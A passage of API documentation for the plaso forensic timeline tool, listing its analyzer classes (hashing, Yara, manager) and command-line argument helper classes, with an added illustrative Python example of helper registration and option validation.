        Returns: results.
        Return type: list[AnalyzerResult]

    INCREMENTAL_ANALYZER = True

    NAME = 'hashing'

    PROCESSING_STATUS_HINT = 'hashing'

    Reset()
        Resets the internal state of the analyzer.

    SetHasherNames(hasher_names_string)
        Sets the hashers that should be enabled.
        Parameters: hasher_names_string (str) – comma separated names of hashers to enable.

plaso.analyzers.interface module

Definitions to provide a whole-file processing framework.

class plaso.analyzers.interface.BaseAnalyzer
    Bases: object

    Class that provides the interface for whole-file analysis.

    abstract Analyze(data)
        Analyzes a block of data, updating the state of the analyzer.
        Parameters: data (bytes) – block of data to process.

    DESCRIPTION = ''


    abstract GetResults()
        Retrieves the results of the analysis.
        Returns: results.
        Return type: list[AnalyzerResult]

    INCREMENTAL_ANALYZER = False

    NAME = 'base_analyzer'

    PROCESSING_STATUS_HINT = 'analyzing'

    abstract Reset()
        Resets the internal state of the analyzer.

    SIZE_LIMIT = 33554432

plaso.analyzers.logger module

The analyzers sub module logger.

plaso.analyzers.manager module

This file contains a class for managing digest analyzers for Plaso.

class plaso.analyzers.manager.AnalyzersManager
    Bases: object

    Class that implements the analyzers manager.

    classmethod DeregisterAnalyzer(analyzer_class)
        Deregisters an analyzer class. The analyzer classes are identified based on their lower case name.
        Parameters: analyzer_class (type) – class object of the analyzer.
        Raises: KeyError – if analyzer class is not set for the corresponding name.

    classmethod GetAnalyzerInstance(analyzer_name)
        Retrieves an instance of a specific analyzer.
        Parameters: analyzer_name (str) – name of the analyzer to retrieve.
        Returns: analyzer instance.
        Return type: BaseAnalyzer
        Raises: KeyError – if analyzer class is not set for the corresponding name.

    classmethod GetAnalyzerInstances(analyzer_names)
        Retrieves instances for all the specified analyzers.
        Parameters: analyzer_names (list[str]) – names of the analyzers to retrieve.
        Returns: analyzer instances.
        Return type: list[BaseAnalyzer]

    classmethod GetAnalyzerNames()
        Retrieves the names of all loaded analyzers.
        Returns: analyzer names.


        Return type: list[str]

    classmethod GetAnalyzers()
        Retrieves the registered analyzers.
        Yields: tuple – containing:
            str: the uniquely identifying name of the analyzer
            type: the analyzer class.

    classmethod GetAnalyzersInformation()
        Retrieves the analyzers information.
        Returns: containing:
            str: analyzer name.
            str: analyzer description.
        Return type: list[tuple]

    classmethod RegisterAnalyzer(analyzer_class)
        Registers an analyzer class. The analyzer classes are identified by their lower case name.
        Parameters: analyzer_class (type) – the analyzer class to register.
        Raises: KeyError – if analyzer class is already set for the corresponding name.

plaso.analyzers.yara_analyzer module

Analyzer that matches Yara rules.

class plaso.analyzers.yara_analyzer.YaraAnalyzer
    Bases: plaso.analyzers.interface.BaseAnalyzer

    Analyzer that matches Yara rules.

    Analyze(data)
        Analyzes a block of data, attempting to match Yara rules to it.
        Parameters: data (bytes) – a block of data.

    DESCRIPTION = 'Matches Yara rules over input data.'

    GetResults()
        Retrieves results of the most recent analysis.
        Returns: results.
        Return type: list[AnalyzerResult]

    INCREMENTAL_ANALYZER = False

    NAME = 'yara'

    PROCESSING_STATUS_HINT = 'yara scan'

    Reset()
        Resets the internal state of the analyzer.

    SetRules(rules_string)
        Sets the rules that the Yara analyzer will use.
        Parameters: rules_string (str) – Yara rule definitions.


Module contents

This file imports Python modules that register analyzers.

5.1.3 plaso.cli package

Subpackages

plaso.cli.helpers package

Submodules

plaso.cli.helpers.analysis_plugins module

The analysis plugins CLI arguments helper.

class plaso.cli.helpers.analysis_plugins.AnalysisPluginsArgumentsHelper
    Bases: plaso.cli.helpers.interface.ArgumentsHelper

    Analysis plugins CLI arguments helper.

    classmethod AddArguments(argument_group)
        Adds command line arguments to an argument group. This function takes an argument parser or an argument group object and adds to it all the command line arguments this helper supports.
        Parameters: argument_group (argparse._ArgumentGroup|argparse.ArgumentParser) – argparse group.

    DESCRIPTION = 'Analysis plugins command line arguments.'

    NAME = 'analysis_plugins'

    classmethod ParseOptions(options, configuration_object)
        Parses and validates options.
        Parameters:
            • options (argparse.Namespace) – parser options.
            • configuration_object (CLITool) – object to be configured by the argument helper.
        Raises:
            • BadConfigObject – when the configuration object is of the wrong type.
            • BadConfigOption – when non-existing analysis plugins are specified.

plaso.cli.helpers.artifact_definitions module

The artifact definitions CLI arguments helper.

class plaso.cli.helpers.artifact_definitions.ArtifactDefinitionsArgumentsHelper
    Bases: plaso.cli.helpers.interface.ArgumentsHelper

    Artifact definition CLI arguments helper.

    classmethod AddArguments(argument_group)
        Adds command line arguments to an argument group.

        This function takes an argument parser or an argument group object and adds to it all the command line arguments this helper supports.

        Parameters
            argument_group (argparse._ArgumentGroup|argparse.ArgumentParser) – argparse group.

    DESCRIPTION = 'Artifact definition command line arguments.'

    NAME = 'artifact_definitions'

    classmethod ParseOptions(options, configuration_object)
        Parses and validates options.

        Parameters
            • options (argparse.Namespace) – parser options.
            • configuration_object (CLITool) – object to be configured by the argument helper.

        Raises
            • BadConfigObject – when the configuration object is of the wrong type.
            • BadConfigOption – if the required artifact definitions are not defined.

plaso.cli.helpers.artifact_filters module

The artifacts filter file CLI arguments helper.

class plaso.cli.helpers.artifact_filters.ArtifactFiltersArgumentsHelper
    Bases: plaso.cli.helpers.interface.ArgumentsHelper

    Artifacts filter file CLI arguments helper.

    classmethod AddArguments(argument_group)
        Adds command line arguments to an argument group.

        This function takes an argument parser or an argument group object and adds to it all the command line arguments this helper supports.

        Parameters
            argument_group (argparse._ArgumentGroup|argparse.ArgumentParser) – argparse group.

    DESCRIPTION = 'Artifact filters command line arguments.'

    NAME = 'artifact_filters'

    classmethod ParseOptions(options, configuration_object)
        Parses and validates options.

        Parameters
            • options (argparse.Namespace) – parser options.
            • configuration_object (CLITool) – object to be configured by the argument helper.

        Raises
            • BadConfigObject – when the configuration object is of the wrong type.
            • BadConfigOption – if the required artifact definitions are not defined.

plaso.cli.helpers.data_location module

The data location CLI arguments helper.

class plaso.cli.helpers.data_location.DataLocationArgumentsHelper
    Bases: plaso.cli.helpers.interface.ArgumentsHelper

    Data location CLI arguments helper.

    classmethod AddArguments(argument_group)
        Adds command line arguments to an argument group.

        This function takes an argument parser or an argument group object and adds to it all the command line arguments this helper supports.

        Parameters
            argument_group (argparse._ArgumentGroup|argparse.ArgumentParser) – argparse group.

    DESCRIPTION = 'Data location command line arguments.'

    NAME = 'data_location'

    classmethod ParseOptions(options, configuration_object)
        Parses and validates options.

        Parameters
            • options (argparse.Namespace) – parser options.
            • configuration_object (CLITool) – object to be configured by the argument helper.

        Raises
            • BadConfigObject – when the configuration object is of the wrong type.
            • BadConfigOption – when the location of the data files cannot be determined.

plaso.cli.helpers.date_filters module

The date filters CLI arguments helper.

class plaso.cli.helpers.date_filters.DateFiltersArgumentsHelper
    Bases: plaso.cli.helpers.interface.ArgumentsHelper

    Date filters CLI arguments helper.

    classmethod AddArguments(argument_group)
        Adds command line arguments to an argument group.

        This function takes an argument parser or an argument group object and adds to it all the command line arguments this helper supports.

        Parameters
            argument_group (argparse._ArgumentGroup|argparse.ArgumentParser) – argparse group.

    DESCRIPTION = 'Date filters command line arguments.'

    NAME = 'date_filters'

    classmethod ParseOptions(options, configuration_object)
        Parses and validates options.

        Parameters
            • options (argparse.Namespace) – parser options.
            • configuration_object (CLITool) – object to be configured by the argument helper.

        Raises
            • BadConfigObject – when the configuration object is of the wrong type.
            • BadConfigOption – when the date filter is badly formatted.

plaso.cli.helpers.dynamic_output module

The dynamic output module CLI arguments helper.

class plaso.cli.helpers.dynamic_output.DynamicOutputArgumentsHelper
    Bases: plaso.cli.helpers.interface.ArgumentsHelper

    Dynamic output module CLI arguments helper.

    classmethod AddArguments(argument_group)
        Adds command line arguments the helper supports to an argument group.

        This function takes an argument parser or an argument group object and adds to it all the command line arguments this helper supports.

        Parameters
            argument_group (argparse._ArgumentGroup|argparse.ArgumentParser) – argparse group.

    CATEGORY = 'output'

    DESCRIPTION = 'Argument helper for the dynamic output module.'

    NAME = 'dynamic'

    classmethod ParseOptions(options, output_module)
        Parses and validates options.

        Parameters
            • options (argparse.Namespace) – parser options.
            • output_module (OutputModule) – output module to configure.

        Raises
            • BadConfigObject – when the output module object is of the wrong type.
            • BadConfigOption – when the output filename was not provided.

plaso.cli.helpers.elastic_output module

The Elastic Search output module CLI arguments helper.

class plaso.cli.helpers.elastic_output.ElasticSearchOutputArgumentsHelper
    Bases: plaso.cli.helpers.interface.ArgumentsHelper

    Elastic Search output module CLI arguments helper.

    classmethod AddArguments(argument_group)
        Adds command line arguments the helper supports to an argument group.

        This function takes an argument parser or an argument group object and adds to it all the command line arguments this helper supports.

        Parameters
            argument_group (argparse._ArgumentGroup|argparse.ArgumentParser) – argparse group.

    CATEGORY = 'output'

    DESCRIPTION = 'Argument helper for the Elastic Search output modules.'

    NAME = 'elastic'

    classmethod ParseOptions(options, output_module)
        Parses and validates options.

        Parameters
            • options (argparse.Namespace) – parser options.
            • output_module (OutputModule) – output module to configure.

        Raises
            • BadConfigObject – when the output module object is of the wrong type.
            • BadConfigOption – when a configuration parameter fails validation.

plaso.cli.helpers.elastic_ts_output module

The Elastic Timesketch output module CLI arguments helper.

class plaso.cli.helpers.elastic_ts_output.ElasticTimesketchOutputArgumentsHelper
    Bases: plaso.cli.helpers.interface.ArgumentsHelper

    Elastic Timesketch output module CLI arguments helper.

    classmethod AddArguments(argument_group)
        Adds command line arguments the helper supports to an argument group.

        This function takes an argument parser or an argument group object and adds to it all the command line arguments this helper supports.

        Parameters
            argument_group (argparse._ArgumentGroup|argparse.ArgumentParser) – argparse group.

    CATEGORY = 'output'

    DESCRIPTION = 'Argument helper for the Elastic Timesketch output module.'

    NAME = 'elastic_ts'

    classmethod ParseOptions(options, output_module)
        Parses and validates options.

        Parameters
            • options (argparse.Namespace) – parser options.
            • output_module (OutputModule) – output module to configure.

        Raises
            • BadConfigObject – when the output module object is of the wrong type.
            • BadConfigOption – when a configuration parameter fails validation.

plaso.cli.helpers.event_filters module

The event filters CLI arguments helper.

class plaso.cli.helpers.event_filters.EventFiltersArgumentsHelper
    Bases: plaso.cli.helpers.interface.ArgumentsHelper

    Event filters CLI arguments helper.

    classmethod AddArguments(argument_group)
        Adds command line arguments to an argument group.

        This function takes an argument parser or an argument group object and adds to it all the command line arguments this helper supports.

        Parameters
            argument_group (argparse._ArgumentGroup|argparse.ArgumentParser) – argparse group.

    DESCRIPTION = 'Event filters command line arguments.'

    NAME = 'event_filters'

    classmethod ParseOptions(options, configuration_object)
        Parses and validates options.

        Parameters
            • options (argparse.Namespace) – parser options.
            • configuration_object (CLITool) – object to be configured by the argument helper.

        Raises
            • BadConfigObject – when the configuration object is of the wrong type.
            • BadConfigOption – when a configuration parameter fails validation.

plaso.cli.helpers.extraction module

The extraction CLI arguments helper.

class plaso.cli.helpers.extraction.ExtractionArgumentsHelper
    Bases: plaso.cli.helpers.interface.ArgumentsHelper

    Extraction CLI arguments helper.

    classmethod AddArguments(argument_group)
        Adds command line arguments to an argument group.

        This function takes an argument parser or an argument group object and adds to it all the command line arguments this helper supports.

        Parameters
            argument_group (argparse._ArgumentGroup|argparse.ArgumentParser) – argparse group.

    DESCRIPTION = 'Extraction command line arguments.'

    NAME = 'extraction'

    classmethod ParseOptions(options, configuration_object)
        Parses and validates options.

        Parameters
            • options (argparse.Namespace) – parser options.
            • configuration_object (CLITool) – object to be configured by the argument helper.

        Raises
            BadConfigObject – when the configuration object is of the wrong type.

plaso.cli.helpers.filter_file module

The filter file CLI arguments helper.

class plaso.cli.helpers.filter_file.FilterFileArgumentsHelper
    Bases: plaso.cli.helpers.interface.ArgumentsHelper

    Filter file CLI arguments helper.

    classmethod AddArguments(argument_group)
        Adds command line arguments to an argument group.

        This function takes an argument parser or an argument group object and adds to it all the command line arguments this helper supports.

        Parameters
            argument_group (argparse._ArgumentGroup|argparse.ArgumentParser) – argparse group.

    DESCRIPTION = 'Filter file command line arguments.'

    NAME = 'filter_file'

    classmethod ParseOptions(options, configuration_object)
        Parses and validates options.

        Parameters
            • options (argparse.Namespace) – parser options.
            • configuration_object (CLITool) – object to be configured by the argument helper.

        Raises
            • BadConfigObject – when the configuration object is of the wrong type.
            • BadConfigOption – if the collection filter file does not exist.

plaso.cli.helpers.hashers module

The hashers CLI arguments helper.

class plaso.cli.helpers.hashers.HashersArgumentsHelper
    Bases: plaso.cli.helpers.interface.ArgumentsHelper

    Hashers CLI arguments helper.

    classmethod AddArguments(argument_group)
        Adds command line arguments to an argument group.

        This function takes an argument parser or an argument group object and adds to it all the command line arguments this helper supports.

        Parameters
            argument_group (argparse._ArgumentGroup|argparse.ArgumentParser) – argparse group.

    DESCRIPTION = 'Hashers command line arguments.'

    NAME = 'hashers'

    classmethod ParseOptions(options, configuration_object)
        Parses and validates options.

        Parameters
            • options (argparse.Namespace) – parser options.
            • configuration_object (CLITool) – object to be configured by the argument helper.

        Raises
            • BadConfigObject – when the configuration object is of the wrong type.
            • BadConfigOption – when a configuration parameter fails validation.

plaso.cli.helpers.interface module

The arguments helper interface.

class plaso.cli.helpers.interface.ArgumentsHelper
    Bases: object

    CLI arguments helper.

    classmethod AddArguments(argument_group)
        Adds command line arguments to an argument group.

        This function takes an argument parser or an argument group object and adds to it all the command line arguments this helper supports.

        Parameters
            argument_group (argparse._ArgumentGroup|argparse.ArgumentParser) – argparse group.

    CATEGORY = ''

    DESCRIPTION = ''

    NAME = 'baseline'

    classmethod ParseOptions(options, configuration_object)
        Parses and validates options.

        Parameters
            • options (argparse.Namespace) – parser options.
            • configuration_object (object) – object to be configured by the argument helper.

        Raises
            • BadConfigObject – when the configuration object is of the wrong type.
            • BadConfigOption – when a configuration parameter fails validation.

plaso.cli.helpers.language module

The language CLI arguments helper.

class plaso.cli.helpers.language.LanguageArgumentsHelper
    Bases: plaso.cli.helpers.interface.ArgumentsHelper

    Language CLI arguments helper.

    classmethod AddArguments(argument_group)
        Adds command line arguments to an argument group.

        This function takes an argument parser or an argument group object and adds to it all the command line arguments this helper supports.

        Parameters
            argument_group (argparse._ArgumentGroup|argparse.ArgumentParser) – argparse group.

    DESCRIPTION = 'Language command line arguments.'

    NAME = 'language'

    classmethod ParseOptions(options, configuration_object)
        Parses and validates options.

        Parameters
            • options (argparse.Namespace) – parser options.
            • configuration_object (CLITool) – object to be configured by the argument helper.

        Raises
            BadConfigObject – when the configuration object is of the wrong type.

plaso.cli.helpers.manager module

The CLI arguments helper manager objects.

class plaso.cli.helpers.manager.ArgumentHelperManager
    Bases: object

    Class that implements the CLI argument helper manager.

    classmethod AddCommandLineArguments(argument_group, category=None, names=None)
        Adds the command line arguments of the registered helpers to an argument group.

        Parameters
            • argument_group (argparse._ArgumentGroup|argparse.ArgumentParser) – argparse group.
            • category (Optional[str]) – category of helpers to apply to the group, such as storage or output, where None applies all helpers regardless of category. The category can be used to add the arguments of a specific group of registered helpers.
            • names (Optional[list[str]]) – names of argument helpers to apply, where None applies all helpers.

    classmethod DeregisterHelper(helper_class)
        Deregisters a helper class.

        The helper classes are identified based on their lower case name.

        Parameters
            helper_class (type) – class object of the argument helper.

        Raises
            KeyError – if no helper class is set for the corresponding name.

    classmethod ParseOptions(options, config_object, category=None, names=None)
        Parses and validates arguments using the appropriate helpers.

        Parameters
            • options (argparse.Namespace) – parser options.
            • config_object (object) – object to be configured by an argument helper.
            • category (Optional[str]) – category of helpers to apply, such as storage or output, where None applies all helpers regardless of category.
            • names (Optional[list[str]]) – names of argument helpers to apply, where None applies all helpers.

    classmethod RegisterHelper(helper_class)
        Registers a helper class.

        The helper classes are identified based on their lower case name.

        Parameters
            helper_class (type) – class object of the argument helper.

        Raises
            KeyError – if a helper class is already set for the corresponding name.

    classmethod RegisterHelpers(helper_classes)
        Registers helper classes.

        The helper classes are identified based on their lower case name.

        Parameters
            helper_classes (list[type]) – class objects of the argument helpers.

        Raises
            KeyError – if a helper class is already set for the corresponding name.

plaso.cli.helpers.nsrlsvr_analysis module

The nsrlsvr analysis plugin CLI arguments helper.

class plaso.cli.helpers.nsrlsvr_analysis.NsrlsvrAnalysisArgumentsHelper
    Bases: plaso.cli.helpers.interface.ArgumentsHelper

    Nsrlsvr analysis plugin CLI arguments helper.

    classmethod AddArguments(argument_group)
        Adds command line arguments the helper supports to an argument group.

        This function takes an argument parser or an argument group object and adds to it all the command line arguments this helper supports.

        Parameters
            argument_group (argparse._ArgumentGroup|argparse.ArgumentParser) – group to append arguments to.

    CATEGORY = 'analysis'

    DESCRIPTION = 'Argument helper for the nsrlsvr analysis plugin.'

    NAME = 'nsrlsvr'

    classmethod ParseOptions(options, analysis_plugin)
        Parses and validates options.

        Parameters
            • options (argparse.Namespace) – parser options object.
            • analysis_plugin (NsrlsvrAnalysisPlugin) – analysis plugin to configure.

        Raises
            • BadConfigObject – when the analysis plugin is the wrong type.
            • BadConfigOption – when unable to connect to the nsrlsvr instance.

plaso.cli.helpers.output_modules module

The output modules CLI arguments helper.

class plaso.cli.helpers.output_modules.OutputModulesArgumentsHelper
    Bases: plaso.cli.helpers.interface.ArgumentsHelper

    Output modules CLI arguments helper.

    classmethod AddArguments(argument_group)
        Adds command line arguments to an argument group.

        This function takes an argument parser or an argument group object and adds to it all the command line arguments this helper supports.

        Parameters
            argument_group (argparse._ArgumentGroup|argparse.ArgumentParser) – argparse group.

    DESCRIPTION = 'Output modules command line arguments.'

    NAME = 'output_modules'

    classmethod ParseOptions(options, configuration_object)
        Parses and validates options.

        Parameters
            • options (argparse.Namespace) – parser options.
            • configuration_object (CLITool) – object to be configured by the argument helper.

        Raises
            • BadConfigObject – when the configuration object is of the wrong type.
            • BadConfigOption – when the output format is not supported, or the output is not provided or already exists.

plaso.cli.helpers.parsers module

The parsers CLI arguments helper.

class plaso.cli.helpers.parsers.ParsersArgumentsHelper
    Bases: plaso.cli.helpers.interface.ArgumentsHelper

    Parsers CLI arguments helper.

    classmethod AddArguments(argument_group)
        Adds command line arguments to an argument group.

        This function takes an argument parser or an argument group object and adds to it all the command line arguments this helper supports.

        Parameters
            argument_group (argparse._ArgumentGroup|argparse.ArgumentParser) – argparse group.

    DESCRIPTION = 'Parsers command line arguments.'

    NAME = 'parsers'

    classmethod ParseOptions(options, configuration_object)
        Parses and validates options.

        Parameters
            • options (argparse.Namespace) – parser options.
            • configuration_object (CLITool) – object to be configured by the argument helper.

        Raises
            BadConfigObject – when the configuration object is of the wrong type.

plaso.cli.helpers.process_resources module

The process resources CLI arguments helper.

class plaso.cli.helpers.process_resources.ProcessResourcesArgumentsHelper
    Bases: plaso.cli.helpers.interface.ArgumentsHelper

    Process resources CLI arguments helper.

    classmethod AddArguments(argument_group)
        Adds command line arguments to an argument group.

        This function takes an argument parser or an argument group object and adds to it all the command line arguments this helper supports.

        Parameters
            argument_group (argparse._ArgumentGroup|argparse.ArgumentParser) – argparse group.

    DESCRIPTION = 'Process resources command line arguments.'

    NAME = 'process_resources'

    classmethod ParseOptions(options, configuration_object)
        Parses and validates options.

        Parameters
            • options (argparse.Namespace) – parser options.
            • configuration_object (CLITool) – object to be configured by the argument helper.

        Raises
            • BadConfigObject – when the configuration object is of the wrong type.
            • BadConfigOption – when a configuration parameter fails validation.

plaso.cli.helpers.profiling module

The profiling CLI arguments helper.

class plaso.cli.helpers.profiling.ProfilingArgumentsHelper
    Bases: plaso.cli.helpers.interface.ArgumentsHelper

    Profiling CLI arguments helper.

    classmethod AddArguments(argument_group)
        Adds command line arguments to an argument group.

        This function takes an argument parser or an argument group object and adds to it all the command line arguments this helper supports.

        Parameters
            argument_group (argparse._ArgumentGroup|argparse.ArgumentParser) – argparse group.

    DEFAULT_PROFILING_SAMPLE_RATE = 1000

    DESCRIPTION = 'Profiling command line arguments.'

    NAME = 'profiling'

    PROFILERS_INFORMATION = {
        'analyzers': 'Profile CPU time of analyzers, like hashing',
        'memory': 'Profile memory usage over time',
        'parsers': 'Profile CPU time per parser',
        'processing': 'Profile CPU time of processing phases',
        'serializers': 'Profile CPU time of serialization',
        'storage': 'Profile storage reads and writes',
        'task_queue': 'Profile task queue status (multi-processing only)',
        'tasks': 'Profile the status of tasks (multi-processing only)'}

    classmethod ParseOptions(options, configuration_object)
        Parses and validates options.

        Parameters
            • options (argparse.Namespace) – parser options.
            • configuration_object (CLITool) – object to be configured by the argument helper.

        Raises
            • BadConfigObject – when the configuration object is of the wrong type.
            • BadConfigOption – when the configuration options are missing or not supported.
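The helper and manager contract documented under plaso.cli.helpers.interface and plaso.cli.helpers.manager, carried through with two of the validations the helpers above describe (the output modules rule that an output must be provided and must not already exist, and the profiling rule that every requested profiler must be a supported one), as an added self-contained example written for this page; it is not plaso's code. ToolConfiguration stands in for CLITool, the helper names, the -w/--write and --profilers flags, GetHelpers and ConfigureTool are hypothetical, and the supported profiler set is a shortened one.

```python
import argparse
import os


class BadConfigObject(Exception):
  """The object handed to ParseOptions is of the wrong type."""


class BadConfigOption(Exception):
  """A command line option failed validation."""


class ToolConfiguration:
  """Hypothetical stand-in for the CLITool object that helpers configure."""
  output_file = None
  profilers = ()


class ArgumentsHelper:
  """Base contract: AddArguments declares options, ParseOptions validates."""
  NAME = 'baseline'
  CATEGORY = ''

  @classmethod
  def _CheckConfigurationObject(cls, configuration_object):
    if not isinstance(configuration_object, ToolConfiguration):
      raise BadConfigObject('Configuration object is not a ToolConfiguration.')


class OutputFileArgumentsHelper(ArgumentsHelper):
  """Hypothetical 'output' helper: a path is required and must not exist yet."""
  NAME = 'output_file'
  CATEGORY = 'output'

  @classmethod
  def AddArguments(cls, argument_group):
    argument_group.add_argument('-w', '--write', dest='output_file',
                                help='output file, which must not already exist.')

  @classmethod
  def ParseOptions(cls, options, configuration_object):
    cls._CheckConfigurationObject(configuration_object)
    output_file = getattr(options, 'output_file', None)
    if not output_file:
      raise BadConfigOption('Output file was not provided.')
    # Refuse to clobber an earlier timeline instead of silently overwriting it.
    if os.path.exists(output_file):
      raise BadConfigOption('Output file already exists: {0:s}'.format(output_file))
    configuration_object.output_file = output_file


class ProfilingArgumentsHelper(ArgumentsHelper):
  """Hypothetical helper: every requested profiler must be a known one."""
  NAME = 'profiling'
  SUPPORTED_PROFILERS = frozenset(['memory', 'parsers', 'processing', 'storage'])

  @classmethod
  def AddArguments(cls, argument_group):
    argument_group.add_argument('--profilers', dest='profilers', default='',
                                help='comma separated list of profilers to enable.')

  @classmethod
  def ParseOptions(cls, options, configuration_object):
    cls._CheckConfigurationObject(configuration_object)
    requested = [name for name in options.profilers.split(',') if name]
    unsupported = sorted(set(requested) - cls.SUPPORTED_PROFILERS)
    if unsupported:
      raise BadConfigOption('Unsupported profilers: {0:s}'.format(', '.join(unsupported)))
    configuration_object.profilers = requested


class ArgumentHelperManager:
  """Registry keyed by lower case helper name, filterable by category or names."""
  _helper_classes = {}

  @classmethod
  def RegisterHelper(cls, helper_class):
    name = helper_class.NAME.lower()
    if name in cls._helper_classes:
      raise KeyError('Helper class already set for name: {0:s}.'.format(name))
    cls._helper_classes[name] = helper_class

  @classmethod
  def GetHelpers(cls, category=None, names=None):
    return [helper for name, helper in sorted(cls._helper_classes.items())
            if (category is None or helper.CATEGORY == category)
            and (names is None or name in names)]

  @classmethod
  def AddCommandLineArguments(cls, argument_group, category=None, names=None):
    for helper_class in cls.GetHelpers(category, names):
      helper_class.AddArguments(argument_group)

  @classmethod
  def ParseOptions(cls, options, config_object, category=None, names=None):
    for helper_class in cls.GetHelpers(category, names):
      helper_class.ParseOptions(options, config_object)


ArgumentHelperManager.RegisterHelper(OutputFileArgumentsHelper)
ArgumentHelperManager.RegisterHelper(ProfilingArgumentsHelper)


def ConfigureTool(argv):
  """Builds a parser from the registered helpers, parses argv and validates it."""
  parser = argparse.ArgumentParser(prog='example_tool')
  ArgumentHelperManager.AddCommandLineArguments(parser)
  configuration = ToolConfiguration()
  ArgumentHelperManager.ParseOptions(parser.parse_args(argv), configuration)
  return configuration
```

ConfigureTool(['-w', 'timeline.csv', '--profilers', 'memory,parsers']) returns a configured object; ConfigureTool(['--profilers', 'memory']) raises BadConfigOption because no output was provided, a path that already exists is rejected before anything is written, an unknown profiler name is rejected by name, and registering the same helper class twice raises KeyError, the same behaviour the manager documents. Because parsing and validation are separate steps, a tool can add only the helpers of one category (for example category='output') to an argument group and still run the full set of checks later.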

plaso.cli.helpers.sessionize_analysis module

The sessionize analysis plugin CLI arguments helper.

class plaso.cli.helpers.sessionize_analysis.SessionizeAnalysisArgumentsHelper
    Bases: plaso.cli.helpers.interface.ArgumentsHelper

    Sessionize analysis plugin CLI arguments helper.

    classmethod AddArguments(argument_group)
        Adds command line arguments the helper supports to an argument group.

        This function takes an argument parser or an argument group object and adds to it all the command line arguments this helper supports.

        Parameters
            argument_group (argparse._ArgumentGroup|argparse.ArgumentParser) – argparse group.

    CATEGORY = 'analysis'

    DESCRIPTION = 'Argument helper for the Sessionize analysis plugin.'

    NAME = 'sessionize'

    classmethod ParseOptions(options, analysis_plugin)
        Parses and validates options.

        Parameters
            • options (argparse.Namespace) – parser options.
            • analysis_plugin (AnalysisPlugin) – analysis plugin to configure.

        Raises
            • BadConfigObject – when the analysis plugin object is of the wrong type.
            • BadConfigOption – when a configuration parameter fails validation.

plaso.cli.helpers.status_view module

The status view CLI arguments helper.

class plaso.cli.helpers.status_view.StatusViewArgumentsHelper
    Bases: plaso.cli.helpers.interface.ArgumentsHelper

    Status view CLI arguments helper.

    classmethod AddArguments(argument_group)
        Adds command line arguments to an argument group.

        This function takes an argument parser or an argument group object and adds to it all the command line arguments this helper supports.

        Parameters
            argument_group (argparse._ArgumentGroup|argparse.ArgumentParser) – argparse group.

    DESCRIPTION = 'Status view command line arguments.'

    NAME = 'status_view'

    classmethod ParseOptions(options, configuration_object)
        Parses and validates options.

        Parameters
            • options (argparse.Namespace) – parser options.
            • configuration_object (CLITool) – object to be configured by the argument helper.

        Raises
            BadConfigObject – when the configuration object is of the wrong type.

plaso.cli.helpers.storage_format module

The storage format CLI arguments helper.

class plaso.cli.helpers.storage_format.StorageFormatArgumentsHelper
    Bases: plaso.cli.helpers.interface.ArgumentsHelper

    Storage format CLI arguments helper.

    classmethod AddArguments(argument_group)
        Adds command line arguments to an argument group.

        This function takes an argument parser or an argument group object and adds to it all the command line arguments this helper supports.

        Parameters
            argument_group (argparse._ArgumentGroup|argparse.ArgumentParser) – argparse group.

    DESCRIPTION = 'Storage format command line arguments.'

    NAME = 'storage_format'

    classmethod ParseOptions(options, configuration_object)
        Parses and validates options.

        Parameters
            • options (argparse.Namespace) – parser options.
            • configuration_object (CLITool) – object to be configured by the argument helper.

        Raises
            • BadConfigObject – when the configuration object is of the wrong type.
            • BadConfigOption – if the storage format or task storage is not defined or not supported.

plaso.cli.helpers.tagging_analysis module

The tagging analysis plugin CLI arguments helper.

class plaso.cli.helpers.tagging_analysis.TaggingAnalysisArgumentsHelper
    Bases: plaso.cli.helpers.interface.ArgumentsHelper

    Tagging analysis plugin CLI arguments helper.

    classmethod AddArguments(argument_group)
        Adds command line arguments the helper supports to an argument group.

        This function takes an argument parser or an argument group object and adds to it all the command line arguments this helper supports.

        Parameters
            argument_group (argparse._ArgumentGroup|argparse.ArgumentParser) – argparse group.

    CATEGORY = 'analysis'

    DESCRIPTION = 'Argument helper for the Tagging analysis plugin.'

    NAME = 'tagging'

    classmethod ParseOptions(options, analysis_plugin)
        Parses and validates options.

        Parameters
            • options (argparse.Namespace) – parser options.
            • analysis_plugin (AnalysisPlugin) – analysis plugin to configure.

        Raises
            • BadConfigObject – when the analysis plugin object is of the wrong type.
            • BadConfigOption – when a configuration parameter fails validation.

plaso.cli.helpers.temporary_directory module

The temporary directory CLI arguments helper.

class plaso.cli.helpers.temporary_directory.TemporaryDirectoryArgumentsHelper
    Bases: plaso.cli.helpers.interface.ArgumentsHelper

    Temporary directory CLI arguments helper.

    classmethod AddArguments(argument_group)
        Adds command line arguments to an argument group.

        This function takes an argument parser or an argument group object and adds to it all the command line arguments this helper supports.

        Parameters
            argument_group (argparse._ArgumentGroup|argparse.ArgumentParser) – argparse group.

    DESCRIPTION = 'Temporary directory command line arguments.'

    NAME = 'temporary_directory'

    classmethod ParseOptions(options, configuration_object)
        Parses and validates options.

        Parameters
            • options (argparse.Namespace) – parser options.
            • configuration_object (CLITool) – object to be configured by the argument helper.

        Raises
            • BadConfigObject – when the configuration object is of the wrong type.
            • BadConfigOption – when the temporary directory does not exist.

plaso.cli.helpers.text_prepend module

The text prepend CLI arguments helper.

class plaso.cli.helpers.text_prepend.TextPrependArgumentsHelper
    Bases: plaso.cli.helpers.interface.ArgumentsHelper

    Text prepend CLI arguments helper.

    classmethod AddArguments(argument_group)
        Adds command line arguments to an argument group.

        This function takes an argument parser or an argument group object and adds to it all the command line arguments this helper supports.

        Parameters
            argument_group (argparse._ArgumentGroup|argparse.ArgumentParser) – argparse group.

    DESCRIPTION = 'Text prepend command line arguments.'

    NAME = 'text_prepend'

    classmethod ParseOptions(options, configuration_object)
        Parses and validates options.

        Parameters
            • options (argparse.Namespace) – parser options.
            • configuration_object (CLITool) – object to be configured by the argument helper.

        Raises
            BadConfigObject – when the configuration object is of the wrong type.

plaso.cli.helpers.vfs_backend module

The VFS back-end CLI arguments helper.

class plaso.cli.helpers.vfs_backend.VFSBackEndArgumentsHelper
    Bases: plaso.cli.helpers.interface.ArgumentsHelper

    VFS back-end CLI arguments helper.

    classmethod AddArguments(argument_group)
        Adds command line arguments to an argument group.

        This function takes an argument parser or an argument group object and adds to it all the command line arguments this helper supports.

        Parameters
            argument_group (argparse._ArgumentGroup|argparse.ArgumentParser) – argparse group.

    DESCRIPTION = 'dfVFS back-end command line arguments.'

    NAME = 'vfs_backend'

    classmethod ParseOptions(options, configuration_object)
        Parses and validates options.

        Parameters
            • options (argparse.Namespace) – parser options.
            • configuration_object (CLITool) – object to be configured by the argument helper.

        Raises
